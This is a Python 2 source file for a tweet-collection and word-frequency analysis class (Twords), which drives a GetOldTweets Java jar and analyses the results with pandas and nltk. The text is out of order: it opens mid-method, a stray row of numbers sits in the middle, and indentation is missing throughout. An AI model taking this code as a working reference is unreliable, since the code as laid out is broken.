# if last_date is a date proceed as normal - if the last_date
# hasn't changed, raise comment below
if self._validate_date(last_date):
until_minus_day_object = datetime.datetime.strptime(until, '%Y-%m-%d') \
- datetime.timedelta(days=1)
until_minus_day = str(until_minus_day_object)[:10]
if last_date == until_minus_day:
# from experimentation sometimes a query of many tweets
# will get "stuck" on a day long before 500 tweets have
# been reached - solution is just increment day as usual
print "Tweets timeline incremented by only one day - may " \
"need larger tweets_per_run, or could just be " \
"regular stutter in querying timeline."
until = last_date
else:
# this increment is to avoid losing tweets at the edge
# between date queries - experimentation showed they can
# be lost without this redundancy - this means when tweets
# are read there may be duplicates that require deletion
new_until_date_object = datetime.datetime.strptime(last_date, '%Y-%m-%d') \
+ datetime.timedelta(days=1)
until = str(new_until_date_object)[:10]
else:
continue_search = False
# set data path to new output folder to read in new tweets easily
self.data_path = user
print "Total time to collect tweets:", \
round((time.time() - start_time)/60.,1), "minutes"
#############################################################
# Methods to clean and prune tweets (probably used
# before visual inspection)
#############################################################
def keep_column_of_original_tweets(self):
""" Devote a column of self.tweets_df to the original, unaltered tweets.
Can be useful for comparison after cleaning.
This should be done before any cleaning functions are applied to the
"text" column of self.tweets_df.
"""
self.tweets_df["original_tweets"] = self.tweets_df["text"]
def lower_tweets(self):
""" Lowers case of text in all the tweets, usernames, mentions and
hashtags in the tweets_df dataframe, if the dataframe has those
columns.
"""
column_names = list(self.tweets_df.columns.values)
if "username" in column_names:
self.tweets_df["username"] = self.tweets_df.username.str.lower()
if "text" in column_names:
self.tweets_df["text"] = self.tweets_df.text.str.lower()
if "mentions" in column_names:
self.tweets_df["mentions"] = self.tweets_df.mentions.str.lower()
if "hashtags" in column_names:
self.tweets_df["hashtags"] = self.tweets_df.hashtags.str.lower()
def keep_only_unicode_tweet_text(self):
""" Keeps only tweets where tweet text is unicode. This drops the
occasional tweet that has a NaN value in dataset, which becomes a float
when read into tweets_df.
"""
self.tweets_df["text_type"] = self.tweets_df["text"].map(lambda text: type(text))
self.tweets_df = self.tweets_df[self.tweets_df.text_type == unicode]
del self.tweets_df["text_type"]
# Reindex dataframe
self.tweets_df.index = range(len(self.tweets_df))
def _remove_urls_from_single_tweet(self, tweet):
""" Remove urls from text of a single tweet.
This uses python tweet parsing library that misses some tweets but
doesn't get hung up with evil regex taking too long.
"""
p = ttp.Parser()
result = p.parse(tweet)
for x in result.urls:
tweet = tweet.replace(x, "")
tweet = tweet.strip()
return tweet
def remove_urls_from_tweets(self):
""" Remove urls from all tweets in self.tweets_df
"""
start_time = time.time()
print "Removing urls from tweets..."
print "This may take a minute - cleaning rate is about 400,000" \
" tweets per minute"
self.tweets_df["text"] = self.tweets_df["text"].map(self._remove_urls_from_single_tweet)
minutes_to_complete = (time.time() - start_time)/60.
print "Time to complete:", round(minutes_to_complete,3), \
"minutes"
print "Tweets cleaned per minute:", round(len(self.tweets_df)/minutes_to_complete, 1)
def remove_punctuation_from_tweets(self):
""" Strip common punctuation from tweets in self.tweets_df
"""
self.tweets_df["text"] = self.tweets_df["text"].apply(lambda x:
''.join([i for i in x if i not in
string.punctuation]))
def drop_non_ascii_characters_from_tweets(self):
""" Remove all characters that are not standard ascii.
"""
self.tweets_df['text'] = self.tweets_df["text"].apply(lambda x:
''.join([i if 32 <= ord(i) < 126 else
"" for i in x]))
def _convert_date_to_standard(self, date_text):
""" Convert a date string of form u"yyyy/mm/dd" into form u"yyyy-mm-dd"
for use with the python date module.
"""
assert type(date_text) in (str, unicode)
date_text = date_text.replace('/', '-')
return date_text
def convert_tweet_dates_to_standard(self):
""" Convert tweet dates from form "yyyy/mm/dd" to "yyyy-mm-dd" in
tweets_df dataframe.
"""
self.tweets_df["date"] = self.tweets_df["date"].map(self._convert_date_to_standard)
def sort_tweets_by_date(self):
""" Sort tweets by their date - useful for any sort of time series
analysis, e.g. analyzing sentiment changes over time.
"""
self.tweets_df.sort_values("date", inplace=True)
# Reindex dataframe
self.tweets_df.index = range(len(self.tweets_df))
def drop_duplicate_tweets(self):
""" Drop duplicate tweets in tweets_df (except for the first instance
of each tweet)
"""
self.tweets_df.drop_duplicates("text", inplace=True)
# Reindex dataframe
self.tweets_df.index = range(len(self.tweets_df))
def drop_by_search_in_name(self):
""" Drop tweets that contain element from search_terms in either
username or mention (i.e., tweets where the search term in contained in
twitter handle of someone writing or mentioned in tweet). Default
values of terms list is search_terms attribute, but user can add
to self.search_terms attribute to drop by additional terms.
"""
if not self.search_terms:
print "search_terms is empty - add at least one term to " + \
"search_terms attribute"
return self
for term in self.search_terms:
assert type(term) in (str, unicode)
assert term # to make sure string isn't empty
# Drop the tweets that contain any of search terms in either a username
# or a mention
column_names = list(self.tweets_df.columns.values)
for term in self.search_terms:
if "mentions" in column_names:
mentions_index = self.tweets_df[self.tweets_df.mentions.str.contains(term) == True].index
self.tweets_df.drop(mentions_index, inplace=True)
if "username" in column_names:
username_index = self.tweets_df[self.tweets_df.username.str.contains(term) == True].index
self.tweets_df.drop(username_index, inplace=True)
# Reindex dataframe
self.tweets_df.index = range(len(self.tweets_df))
def keep_tweets_with_terms(self, term_list):
""" Drops all the tweets in tweets_df that do NOT contain at least one
term from term_list. This is useful for handling data from Twitter API
search stream, where it is often easiest to collect a single big stream
using several search terms and then parse the stream later.
Sometimes even tweets collected with java collector don't contain
desired terms, so this can be useful there as well.
term_list (string or list of strings): collection of terms to drop on
"""
if type(term_list) == str:
assert len(term_list) > 0
keep_index = self.tweets_df[self.tweets_df.text.str.contains(term_list) == True].index
self.tweets_df = self.tweets_df.iloc[keep_index]
if type(term_list) == list:
keep_index = pd.core.index.Int64Index([], dtype='int64')
for term in term_list:
assert len(term) > 0
term_keep_index = self.tweets_df[self.tweets_df.text.str.contains(term) == True].index
keep_index = keep_index.append(term_keep_index)
keep_index = keep_index.drop_duplicates()
self.tweets_df = self.tweets_df.iloc[keep_index]
# Reindex dataframe
self.tweets_df.index = range(len(self.tweets_df))
#############################################################
# Methods to prune tweets (probably used after visual
# inspection)
#############################################################
def drop_by_term_in_name(self, terms):
""" Drop tweets that contain element from terms in either username or
mention. The terms parameter must be a list of strings.
This method is the same as drop_by_search_in_name method, except it
takes arbitrary input from user. This can be used to help get rid of
spam.
terms (list): python list of strings
"""
if not terms:
print "terms is empty - enter at least one search terms string"
return self
for term in terms:
assert type(term) in (str, unicode)
assert term
# Drop the tweets that contain any of terms in either a username
# or a mention
# don't need to set " == True", that is redundant
column_names = list(self.tweets_df.columns.values)
for term in terms:
if "mentions" in column_names:
mentions_index = self.tweets_df[self.tweets_df.mentions.str.contains(term) == True].index
self.tweets_df.drop(mentions_index, inplace=True)
if "username" in column_names:
username_index = self.tweets_df[self.tweets_df.username.str.contains(term) == True].index
self.tweets_df.drop(username_index, inplace=True)
# Reindex dataframe
self.tweets_df.index = range(len(self.tweets_df))
def drop_by_term_in_tweet(self, terms):
""" Drop tweets that contain element from terms in the tweet text.
Terms can be either a string (which is treated as one term) or a list
of strings (which area each treated as a separate drop case).
This is most useful for getting rid of repetitive or spammy tweets that
appear to be distorting data.
This is also useful for dropping retweets, which can be accomplished
by dropping tweets containing the string "rt @"
terms (string or python list of strings): terms that appear in tweets
we want to drop
"""
if type(terms) in (str, unicode):
text_index = self.tweets_df[self.tweets_df.text.str.contains(terms) == True].index
self.tweets_df.drop(text_index, inplace=True)
elif type(terms) == list:
for term in terms:
assert type(term) in (str, unicode)
assert len(term) > 0
text_index = self.tweets_df[self.tweets_df.text.str.contains(term) == True].index
self.tweets_df.drop(text_index, inplace=True)
else:
raise Exception("Input must be string or list of string.")
# Reindex dataframe
self.tweets_df.index = range(len(self.tweets_df))
def drop_by_username_with_n_tweets(self, max_num_occurrences=1):
""" Drops all tweets by usernames that appear more than
max_num_occurrences times in tweets_df.
This function can be time consuming.
Dropping all users with more than 1 tweet should be a safe way to
filter out a lot of the spam.
"""
start_time = time.time()
print "Dropping tweets by repeated users..."
# get list of usernames that occur too much
repeat_user_counts = self.tweets_df["username"].value_counts()
for i in range(len(repeat_user_counts)):
if repeat_user_counts[i] <= max_num_occurrences:
break_index = i
break
repeated_usernames = list(repeat_user_counts[0:break_index].index)
print "Found", len(repeated_usernames), "users with more than", \
max_num_occurrences, "tweets in tweets_df"
# drop these usernames from tweets_df
percentile_num = len(repeated_usernames)//20
for i, twitter_username in enumerate(repeated_usernames):
if len(repeated_usernames) <= 100:
print "Dropping tweets from user", i
elif i%percentile_num == 0:
print "Finished", 5*i/percentile_num, "percent of user drops"
drop_index = self.tweets_df[self.tweets_df.username == twitter_username].index
self.tweets_df.drop(drop_index, inplace=True)
# Reindex dataframe
self.tweets_df.index = range(len(self.tweets_df))
print "Took", round((time.time() - start_time)/60.,3), \
"minutes to complete"
def add_stop_words(self, stopwords_item):
""" Add word or list of words to stop words used in create_word_bag.
The word might be a url or spam tag. A common case is parts of urls
that are parsed into words (e.g. from youtube) that appear repeatedly.
The new stopwords will appear at end of self.stop_words list, so user
can easily check to see which stopwords have been recently added by the
user.
stopwords: (string or list of strings):
"""
if type(stopwords_item) in (str, unicode):
if type(stopwords_item) == str:
# convert string to unicode if not unicode already
stopwords_item = stopwords_item.decode('utf-8')
self.stop_words = self.stop_words + [stopwords_item]
elif type(stopwords_item) == list:
for term in stopwords_item:
assert type(term) in (str, unicode)
assert len(term) > 0
unicode_terms_list = [term if type(term) == unicode
else term.decode('utf-8')
for term in stopwords_item]
self.stop_words = self.stop_words + unicode_terms_list
else:
raise Exception("Input must be string or list of strings.")
#############################################################
# Methods for investigating word frequencies
#############################################################
""" The create_word_freq_df method is used to create a dataframe
that gives the word occurrences and word frequencies of the top n words in
the corpus. This is created using the existing nltk object, and it is
changed depending on how many words we wish to inspect graphically.
This word frequency dataframe is fundamental object of interest, and is
stored in the word_freq_df attribute, which is a pandas dataframe.
For now the background corpus is derived from ~2.6 GB of twitter data,
composing about 72 million words. The word frequency rates from this
sample are stored in a frequency sample file that is then converted into
a python dictionary for fast lookup.
"""
def create_word_bag(self):
""" Takes tweet dataframe and outputs word_bag, which is a list of all
words in all tweets, with punctuation and stop words removed. word_bag
is contained inside the attribute self.word_bag.
This method will often be called repeatedly during data inspection, as
it needs to be redone every time some tweets are dropped from
tweets_df.
"""
start_time = time.time()
# Convert dataframe tweets column to python list of tweets, then join
# this list together into one long list of words
tweets_list = self.tweets_df["text"].tolist()
words_string = " ".join(tweets_list)
print "Time to make words_string: ", round((time.time() - start_time)/60., 3), "minutes"
start_time = time.time()
# Use nltk word tokenization to break list into words and remove
# stop words
tokens = nltk.word_tokenize(words_string)
print "Time to tokenize: ", round((time.time() - start_time)/60., 3), "minutes"
start_time = time.time()
self.word_bag = [word for word in tokens if word not in self.stop_words]
print "Time to compute word bag: ", round((time.time() - start_time)/60., 3), "minutes"
def make_nltk_object_from_word_bag(self, word_bag=None):
""" Creates nltk word statistical object from the current word_bag
attribute. word_bag is left as an input in case the user wants to
create an nltk object with an external word bag.
The most common method we'll use from this object is the
frequency method, i.e. freq_dist.freq(term), where term is word in
word bag.
Use print(freq_dist) to get the number of unique words in corpus, as
well as total number of words in corpus.
Can use freq_dist.most_common(50) to get list of 50 most common words
and the number of times each of them appears in text.
"""
if word_bag is None:
word_bag = self.word_bag
self.freq_dist = nltk.FreqDist(self.word_bag)
def create_word_freq_df(self, top_n_words):
""" Creates pandas dataframe called word_freq_df of the most common n
words in corpus, with columns:
occurrences: how often each of them occurred
frequency: word frequency in the corpus
frequency ratio: word relative frequency to background
log frequency ratio: log of the relative frequency to background rates
background_occur: the number of times word appears in background corpus
(The log is useful because, for example, a rate two times as high as
background has log ratio of +x, and a rate two times lower than
background rates has a log ratio of -x.)
n is the number of words we want to see. These words are draw in order
of how frequently they are found in the corpus, so a large number of
words should be chosen to make sure we find the interesting ones that
appear much more often than in background corpus. (If a word appears
often in our search corpus it may be because it also appear often in
the background corpus, which is not of interest.)
The actual words that were searched to collect the corpus are omitted
from this dataframe (as long as self.search_terms has been set).
n (int): number of most frequent words we want to appear in dataframe
"""
print "Creating word_freq_df..."
print "Takes about 1 minute per 1000 words"
start_time = time.time()
# make dataframe we'll use in plotting
num_words = top_n_words
word_frequencies_list = []
for word, occurrences in self.freq_dist.most_common(num_words):
# determine whether word appears in background dict; if it does
# not, the frequency ratio is set to zero
if word in self.search_terms:
continue
if word in self.background_dict.keys():
freq_ratio = self.freq_dist.freq(word)/self.background_dict[word][0]
background_freq = self.background_dict[word][0]
log_freq_ratio = log(freq_ratio)
background_occur = self.background_dict[word][1]
else:
freq_ratio = 0
background_freq = 0
log_freq_ratio = 0
background_occur = 0
# faster to make list and then make dataframe in one line
# than to repeatedly append to an existing dataframe
word_frequencies_list.append((word, occurrences,
self.freq_dist.freq(word),
freq_ratio, log_freq_ratio,
background_occur))
word_freq_df = pd.DataFrame(word_frequencies_list,
columns=['word', 'occurrences', 'frequency',
'relative frequency', 'log relative frequency',
'background occurrences'])
print "Time to create word_freq_df: ", \
round((time.time() - start_time)/60., 4), "minutes"
self.word_freq_df = word_freq_df
def custom_word_frequency_dataframe(self, words):
""" Same function as create_word_freq_df except instead of
using top n words from corpus, a custom list of words is used. This
function returns the dataframe it creates instead of setting it to
word_freq_df. (The user can append what this function creates to
word_freq_df by hand with pd.concat(df1, df1).)
An example use case is to use a list of known words of interest to
construct a type of "word vector" for a particular word (presumably
the word searched on using Java tweet collector). For example, for
politics one might choose words like "conservative", "liberal",
"regulation" and "liberty" as a set of word axes, and then see how
twitter-searched words like "taxes", "Obamacare", etc. appear as word
vectors along these axes.
words: list of words to put in dataframe - each word is a string
"""
word_frequencies_list = []
words = [x.decode("utf-8") if type(x) == str else x for x in words]
for word in words:
# determine whether word appears in both background dict and corpus
# if it does not, the frequency ratio is set to zero
if word in self.search_terms:
continue
occurrences = self.freq_dist[word]
if word in self.background_dict.keys() and occurrences != 0:
freq_ratio = self.freq_dist.freq(word)/self.background_dict[word][0]
background_freq = self.background_dict[word][0]
log_freq_ratio = log(freq_ratio)
background_occur = self.background_dict[word][1]
else:
freq_ratio = 0
background_freq = 0
log_freq_ratio = 0
background_occur = 0
# faster to make list and then make dataframe in one line
# than to repeatedly append to an existing dataframe
word_frequencies_list.append((word, occurrences,
self.freq_dist.freq(word),
freq_ratio, log_freq_ratio,
background_occur))
word_freq_df = pd.DataFrame(word_frequencies_list,
columns=['word', 'occurrences', 'frequency',
'relative frequency', 'log relative frequency',
'background_occur'])
return word_freq_df
def plot_word_frequencies(self, plot_string, dataframe=None):
""" Plots of given value about word, where plot_string is a string
that gives quantity to be plotted. This is just an example function,
user will want to use word_freq_df and matplotlib directly for more
detailed and better-looking plots.
Note that the plot can't display unicode characters correctly, so if a
word looks like a little box you'll have to pull up word_freq_df to see
what the character actually is.
plot_string (string): column of word_freq_df dataframe, e.g.
"occurrences", "frequency", "relative frequency",
"log relative frequency", etc.
dataframe (pandas dataframe): dataframe of the same form as
word_freq_df; if left empty then
self.word_freq_df is plotted
"""
if dataframe is None:
dataframe = self.word_freq_df
num_words = len(dataframe)
try:
dataframe.set_index("word")[plot_string].plot.barh(figsize=(20,
num_words/2.), fontsize=30, color="c");
plt.title(plot_string, fontsize=30);
ax = plt.axes();
ax.xaxis.grid(linewidth=4);
except:
raise Exception("Input string must be column name of word_freq_df")
""" This was more customized code that can be used later if needed - for
now the pandas default plotting code is good enough for most purposes
sns.set(style="darkgrid")
num_words = len(self.word_freq_df)
# Initialize the matplotlib figure - the second number in figure gives
# height, this will need to depend on how many words are included in
# figure
f, ax = plt.subplots(figsize=(16, num_words/2.))
plt.yticks(fontsize=20)
plt.xticks(fontsize=20)
# Plot the frequencies
sns.set_color_codes("pastel")
sns.barplot(x=plot_string, y="word", data=self.word_freq_df,
label="frequency", color="b")
# Add informative axis label
max_value = self.word_freq_df.iloc[0].frequency # find maximum frequency
# adjust axis to be slightly larger than this max frequency
ax.set(xlim=(0, max_value*1.1), ylabel="", xlabel="Word frequency")
ax.set_xlabel(plot_string, fontsize=30)
ax.xaxis.set_label_position('top')
ax.xaxis.tick_top()
ax.tick_params(axis='x', labelsize=20) # size of numerical labels
"""
#############################################################
# Methods to inspect tweets in tweets_df dataframe
#############################################################
""" These methods are used to inspect tweets of interest in the main
dataframe tweets_df. A typical workflow is to visualize tweet word
frequencies using visualization functions, then inspect a sample of tweets
that contain a word of interest. If these tweets appear to be unwanted they
can then be dropped using the dropping functions above.
Note about displaying tweets in pandas in readable form: need to set
pd.set_option('display.max_colwidth', -1) and/or
pd.set_option('display.width',800)
This makes it so entire tweet is displayed without cutoff when only tweets
are presented in dataframe.
Can enter pd.describe_option('display') to get comprehensive list of
settings for ipython displays.
"""
def tweets_containing(self, term):
""" Returns all tweets that contain term from tweets_df.
Term is a string.
The returned object is a dataframe that contains the rows of tweets_df
dataframe that have tweets containing term.
term (string): term of interest
"""
assert type(term) in (str, unicode)
assert term
tweets_containing = self.tweets_df[self.tweets_df.text.str.contains(term) == True]
print len(tweets_containing), "tweets contain this term"
return tweets_containing[["username", "text"]]
def tweets_by(self, username):
""" Returns all tweets by username from tweets_df.
Similar to above function except searches by username rather than
tweet text.
username (string): username of interest
"""
assert type(username) in (str, unicode)
assert username
tweets_by = self.tweets_df[self.tweets_df.username == username]
return tweets_by[["username", "text"]]
| 46.611111 | 147 | 0.605502 | #!/usr/bin/python
# -*- coding: utf-8 -*-
import time
import datetime
import string
from os import listdir
from os.path import join as pathjoin
from math import log, ceil
import subprocess
import pandas as pd
import nltk
from nltk.corpus import stopwords
import matplotlib.pyplot as plt
import tailer
from ttp import ttp
# use this if you want to include modules from a subfolder
#cmd_subfolder = os.path.realpath(os.path.abspath(os.path.join(os.path.split(inspect.getfile( inspect.currentframe() ))[0],"GetOldTweets-python")))
#if cmd_subfolder not in sys.path:
# sys.path.insert(0, cmd_subfolder)
pd.set_option('display.max_colwidth', -1)
class Twords(object):
""" Object that takes in tweets from Java twitter search engine and allows
manipulation, analysis and visualization.
Attributes:
jar_folder_path (string): path to where java jar twitter search files
are stored
data_path (string): path to data set from java twitter search.
It can be either path to single file, or path to
directory containing several csv files. Files are
assumed to be in format give by output of
create_java_tweets function below
background_path (string): path to background data. Form of background
data file is csv with columns 'word', 'occurrences',
and 'frequency' for words as they occur in some
background corpus.
background_dict (dictionary): dictionary of background rates of English
words, used in comparing word frequencies.
Can be set using create_Background_dict
function.
search_terms (list of strings): list of search terms used when collecting
tweets using create_java_tweets
tweets_df (pandas dataframe): pandas dataframe that holds all tweet data.
This is central object in an instance of
Twords.
word_bag (list of strings): list of all word tokens in tweets contained
in tweets_df, not including stop words (stop
words are contained in self.stop_words)
stop_words (list of string): list of words that shouldn't be included when
computing word bag for tweets. This includes
standard English words like "the" as well as
Twitter-data-specific things like "https://"
freq_dist (nltk object): nltk.FreqDist(self.word_bag); nltk object that
contains statistical properties of words in
word_bag
word_freq_df (pandas dataframe): pandas dataframe containing top n words
in tweets data along with data like
word frequency, word frequency divided
by background frequency for that word, etc.
More info under function
create_word_freq_df(self, n),
which creates word_freq_df.
"""
def __init__(self):
self.jar_folder_path = ''
self.data_path = ''
self.background_path = ''
self.background_dict = {}
self.search_terms = []
self.tweets_df = pd.DataFrame()
self.word_bag = []
self.stop_words = []
self.freq_dist = nltk.FreqDist(self.word_bag)
self.word_freq_df = pd.DataFrame()
def __repr__(self):
return "Twitter word analysis object"
#############################################################
# Methods to set attributes
#############################################################
def set_Search_terms(self, search_terms):
""" search_terms is a list of strings that were used in twitter search
to obtain data in tweets_df.
The strings will be converted to unicode inside Twords, even though the
user may enter them as ordinary strings.
"""
assert type(search_terms) == list
for term in search_terms:
assert type(term) in (str, unicode)
unicode_list = [x.decode("utf-8") if type(x) == str
else x for x in search_terms]
self.search_terms = unicode_list
def create_Background_dict(self):
""" Create the dictionary of background word rates from file in the
background data path.
key: word (string)
value: tuple of form (frequency, occurrences), where
frequency is frequency of word in background data set, and
occurrences is total number of occurrences in background data
set
"""
sample_rates = pd.read_csv(self.background_path, sep=",", encoding='utf-8')
background_dict = dict(zip(sample_rates["word"], zip(sample_rates["frequency"],sample_rates["occurrences"])))
self.background_dict = background_dict
def create_Stop_words(self):
""" Create list of stop words used in create_word_bag function.
Stop words created here are defaults - the user may add new stop words
later with the add_stop_words function.
This default list combines English stopwords from nltk corpus
(stopwords), punctuation marks from python standard string library,
and a custom-list the author found useful when parsing tweets.
"""
punctuation = [item.decode('utf-8') for item in list(string.punctuation)]
stop = stopwords.words('english') + punctuation + \
[u'rt', u'RT', u'via', u'http', u"n't", u"'s", u"...", u"''",
u"'m", u"--", u"'ll", u"'ve", u"'re", u"//www"]
self.stop_words = stop
##############################################################
# Methods to gather tweets via keyword search with
# Java GetOldTweets
##############################################################
def create_java_tweets(self, total_num_tweets, tweets_per_run, querysearch,
final_until=None, output_folder="output",
decay_factor=4, all_tweets=True):
""" Function that calls java program iteratively further and further
back in time until the desired number of tweets are collected. The
"until" parameter gives the most recent date tweets can be found from,
and the search function works backward in time progressively from that
date until the max number of tweets are found. Thus each new call to
_get_one_java_run_and_return_last_line_date will start the search one
day further in the past.
total_num_tweets: (int) total number of tweets to collect
tweets_per_run: (int) number of tweets in call to java program - should
not be over 50,000, better to keep around 10,000
querysearch: (string) string defining query for twitter search - see
Henrique code
(e.g, "europe refugees" for search for tweets containing
BOTH "europe" and "refugees" - currently putting in OR by
hand does not yield desired result, so two separate
searches will have to be done for "OR" between words)
final_until: (string) date string of the form '2015-07-31' that gives
ending date that tweets are searched before (this is
distinguished from the changing "until" that is used in
the calls to _get_one_java_run_and_return_last_line_date).
If left as "None" it defaults to the current date.
output_folder: (string) name of folder to put output in
decay_factor: (int) how quickly to wind down tweet search if errors
occur and no tweets are found in a run - a failed run
will count as tweets_per_run/decay_factor tweets found,
so the higher the factor the longer the program will try
to search for tweets even if it gathers none in a run
all_tweets: (bool) flag for which jar to use - True means use
all_tweets jar, False means use top_tweets jar
"""
if final_until is None:
final_until = str(datetime.datetime.now())[:10]
print "Collecting", str(total_num_tweets), "tweets with", \
str(tweets_per_run), "tweets per run."
print "Expecting", \
str(int(ceil(total_num_tweets/float(tweets_per_run)))), \
"total runs"
start_time = time.time()
tweets_searched = 0
run_counter = 1
# create folder that tweets will be saved into
subprocess.call(['mkdir', output_folder])
until = final_until
while tweets_searched < total_num_tweets:
print "Collecting run", run_counter
run_counter += 1
# call java program and get date of last tweet found
last_date = self._get_one_java_run_and_return_last_line_date(
querysearch, until, tweets_per_run, all_tweets)
# rename each output file and put into new folder - output file
# is named by until date
new_file_location = output_folder + '/' + querysearch + '_' + \
until + '.csv'
subprocess.call(['mv', 'output_got.csv', new_file_location])
# if last_date is usual date proceed as normal - if not raise error
# and stop search
if self._validate_date(last_date):
until = last_date
tweets_searched += tweets_per_run
else:
# set search date one day further in past
new_until_date_object = datetime.datetime.strptime(until, '%Y-%m-%d') \
- datetime.timedelta(days=1)
until = str(new_until_date_object)[:10]
# consider this a few tweets searched so program doesn't run
# forever if it gathers no tweets
tweets_searched += (tweets_per_run)/float(decay_factor)
self.data_path = output_folder
self.search_terms = querysearch.split()
print "Total time to collect", str(total_num_tweets), "tweets:", \
round((time.time() - start_time)/60.,1), "minutes"
def get_tweets_from_single_java_csv(self):
""" Takes path to twitter data obtained with java tweet search library
and builds a dataframe of the tweets and their accompanying
information. Dataframe has columns for username, date, retweets,
favorites, text, mentions, and hashtag. The dataframe is stored under
the attribute tweets_pd.
"""
# Read in csv file with many columns to account for people who put many
# semicolons in tweets, then keep only the rows that don't have
# semicolons in a tweet by dropping rows with too many columns.
# (Semicolons are the delimeter in the java twitter search library.)
tweets = pd.read_csv(self.data_path, sep=";",
names=list('abcdefghijklmno'), encoding='utf-8')
tweets = tweets[tweets.k.isnull()]
# Rename the columns with correct labels and drop row that is just
# column names (this will index dataframe starting at 1).
tweets.columns = tweets.iloc[0]
tweets.drop(0, inplace=True)
# Drop the extra columns on the end
tweets = tweets[["username", "date", "retweets", "favorites", "text",
"mentions", "hashtags", "id", "permalink"]]
# Reindex dataframe
tweets.index = range(len(tweets))
self.tweets_df = tweets
def get_java_tweets_from_csv_list(self, list_of_csv_files=None):
""" Create tweets_df from list of tweet csv files
list_of_csv_files: python list of paths (the paths are strings) to csv
files containing tweets - if list_of_csv_files is
None then the files contained inside self.data_path
are used
"""
if list_of_csv_files is None:
list_of_csv_files = self._get_list_of_csv_files(self.data_path)
path_dict = {}
# create dictionary with paths for keys and corresponding tweets
# dataframe for values
for path in list_of_csv_files:
tweets = pd.read_csv(path, sep=";", names=list('abcdefghijklmno'),
encoding='utf-8')
tweets = tweets[tweets.k.isnull()]
tweets.columns = tweets.iloc[0]
tweets.drop(0, inplace=True)
tweets = tweets[["username", "date", "retweets", "favorites",
"text", "mentions", "hashtags", "id", "permalink"]]
tweets.index = range(len(tweets))
path_dict[path] = tweets
# join all created dataframes together into final tweets_df dataframe
self.tweets_df = pd.concat(path_dict.values(), ignore_index=True)
def _get_one_java_run_and_return_last_line_date(self, querysearch, until,
maxtweets, all_tweets=True,
since=None,
return_line=True):
""" Create one java csv using java jar (either Top Tweets or All tweets
as specified in all_tweets tag) and return date string from last tweet
collected.
querysearch: (string) query string, usually one word - multiple words
imply an "AND" between them
maxtweets: (int) number of tweets to return
since: (string of form '2015-09-30') string of date to search since;
this is optional and won't be used when using the
create_java_tweets function
until: (string of form '2015-09-30') string of date to search until,
since search is conducted backwards in time
return_line (bool): whether to return date from last line or not; if
true the date from the last line in the csv is
returned
"""
start_time = time.time()
# choose which jar file to use
jar_string = self.jar_folder_path + '/got_top_tweets.jar'
if all_tweets:
jar_string = self.jar_folder_path + '/got_all_tweets.jar'
# create search string
quotation_mark = '"'
query_string = 'querysearch=' + quotation_mark + querysearch + quotation_mark
until_string = 'until=' + until
maxtweets_string = 'maxtweets=' + str(maxtweets)
# create output_got.csv file of tweets with these search parameters
if since is None:
subprocess.call(['java', '-jar', jar_string, query_string,
until_string, maxtweets_string])
else:
since_string = 'since=' + since
subprocess.call(['java', '-jar', jar_string, query_string,
since_string, until_string, maxtweets_string])
# find date on last tweet in this file (in last line of file)
last_line = tailer.tail(open('output_got.csv'), 1)[0]
date_position = last_line.find(';')
date_string = last_line[date_position+1:date_position+11]
date_string = self._convert_date_to_standard(date_string)
print "Time to collect", str(maxtweets), "tweets:", \
round((time.time() - start_time)/60., 1), "minutes"
if return_line:
return date_string
def _get_list_of_csv_files(self, directory_path):
""" Return list of csv files inside a directory
directory_path: (string) path to directory holding csv files of
interest
"""
return [pathjoin(directory_path, f) for f in listdir(directory_path)
if f[-4:] == '.csv']
def _validate_date(self, date_text):
""" Return true if date_text is string of form '2015-06-29',
false otherwise.
date_text (string): date
"""
try:
datetime.datetime.strptime(date_text, '%Y-%m-%d')
return True
except ValueError:
return False
##############################################################
# Methods to gather user timeline tweets with
# Java GetOldTweets
##############################################################
def get_user_tweets(self, user, max_tweets, start_date=None,
end_date=None, all_tweets=True, return_line=True):
""" Returns max_tweets from Twitter timeline of user. Appears to work
better when start and end dates are included. The returned tweets
include tweets on the start_date, and up to (but not including) tweets
on the end_date.
If only an end_date is provided, then the tweets are searched backward
in time starting at the end date and continuing until max_tweets
have been found.
Creates folder named by twitter username searched that contains tweets
in series of csv files.
user (string): Twitter handle of user, e.g. barackobama
max_tweets (int): number of tweets to return for that user; set
max_tweets to -1 to return all tweets in timeline
start_date (string): starting date for search of form "2015-09-30"
end_date (string): ending date for search of form "2015-09-30"
all_tweets (bool): whether to use "top_tweets" or "all_tweets" java
jar file
return_line (bool): whether to return date on last tweet returned;
needed for function that makes repeated calls to
this function, e.g. get_all_user_tweets
"""
start_time = time.time()
# choose which jar file to use
jar_string = self.jar_folder_path + '/got_top_tweets.jar'
if all_tweets:
jar_string = self.jar_folder_path + '/got_all_tweets.jar'
# create search string
user_string = 'username=' + user
maxtweets_string = 'maxtweets=' + str(max_tweets)
if start_date is not None:
since_string = 'since=' + start_date
if end_date is not None:
until_string = 'until=' + end_date
# create output_got.csv file of tweets with these search parameters
if start_date is None and end_date is None:
subprocess.call(['java', '-jar', jar_string, user_string,
maxtweets_string])
elif start_date is None and end_date is not None:
subprocess.call(['java', '-jar', jar_string, user_string,
until_string, maxtweets_string])
else:
subprocess.call(['java', '-jar', jar_string, user_string,
since_string, until_string, maxtweets_string])
# find date on last tweet in this file (in last line of file)
last_line = tailer.tail(open('output_got.csv'), 1)[0]
date_position = last_line.find(';')
date_string = last_line[date_position+1:date_position+11]
date_string = self._convert_date_to_standard(date_string)
print "Time to collect", str(max_tweets), "tweets:", \
round((time.time() - start_time)/60.,1), "minutes"
if return_line:
return date_string
def get_all_user_tweets(self, user, tweets_per_run):
""" Return all tweets in a user's timeline. This is necessary
to do in batches since one call to get_user_tweets does not return
all of the tweets (too many in one run breaks the web-scrolling
functionality of GetOldTweets). The tweets are saved as series of
csv files into output folder named by username of twitter user.
The final date is one day after the current date, since tweets are
returned up to (but not including) the end_date in get_user_tweets
function.
This function will return duplicates of some tweets to be sure all
tweets are obtained - these can be eliminated by simply dropping
duplicates in the text column of resulting pandas dataframe.
Function typically fails to return every single tweet, but captures
most (~87 percent for barackobama) - best performance when
tweets_per_run is around 500.
Creates: folder (named by username searched) of csv files
user (string): twitter handle of user, e.g. "barackobama"
tweets_per_run (int): how many tweets to pull in each run
"""
# increment the date one day forward from returned day when calling
# get_user_tweets to be sure all tweets in overlapping
# range are returned - experimentation showed that tweets on the edge
# between date runs can be lost otherwise
start_time = time.time()
print "Collecting tweets with", str(tweets_per_run), "tweets per run."
# create folder that tweets will be saved into
subprocess.call(['mkdir', user])
# set one day in future so that all tweets up to today are returned;
# necessary because tweets are returned on dates up to but not
# including end date
final_until = str(datetime.datetime.now() +
datetime.timedelta(days=1))[:10]
